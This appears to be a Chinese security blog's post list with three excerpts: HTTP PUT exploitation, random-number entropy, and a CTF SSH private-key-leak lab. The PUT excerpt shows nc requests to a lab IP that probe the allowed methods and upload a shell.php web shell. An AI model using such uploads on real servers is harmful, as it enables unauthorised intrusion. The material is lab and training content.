- 博客(4)
- 收藏
- 关注
RSS订阅原创 HTTP PUT方法利用
nc 192.168.56.111 80OPTIONS /test/ HTTP/1.1Host: 192.168.56.111#double return在返回的ALLOW字段里面,如果有PUT,表示可以上传任意文件。nc 192.168.56.111 80PUT /test/shell.php HTTP/1.1Host: 192.168.56.111...
2019-06-13 09:31:21
3649
原创 关于随机数
一般来说随机数在系统中用于生成对称密钥,所以随机数在安全中的地位至关重要,由于系统或者硬件的因素,生成真实的随机数存在着性能上的问题,对于服务端来说,一次生成大量的真随机数比较困难,实际应用中都是把真随机数作为种子+随机数生成算法生成大量的随机数,称为伪随机数。为了保证伪随机数的安全性,防止被预测,对于种子是由相应的要求的。1)熵(Entropy):在封闭系统中衡量无序、随机或差异性的量度,在...
2019-06-12 11:30:23
1822
原创 CTF训练之现学现卖--SSH私钥泄露
【原创】CTF训练之现学现卖–SSH私钥泄露Step1 环境搭建:KALI官网下载vmware虚拟机Virtual PC加载SSH-私钥泄露.ova (链接:https://pan.baidu.com/s/1dZzfdiWTU1XtI5bqocNosQ提取码:45n0 )搭建局域网络,使vmware和vpc互通,在同一个子网我在vmware下配置双网卡,eth0通过nat连向外部网络,...
2019-06-08 20:38:59
1633
3
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人